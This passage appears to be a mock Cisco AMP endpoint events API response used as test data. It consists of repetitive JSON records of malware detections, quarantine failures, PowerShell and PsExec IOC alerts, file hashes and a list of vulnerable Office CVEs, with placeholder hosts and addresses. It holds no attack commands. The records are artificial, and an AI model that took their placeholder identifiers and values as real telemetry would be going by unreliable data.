IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud 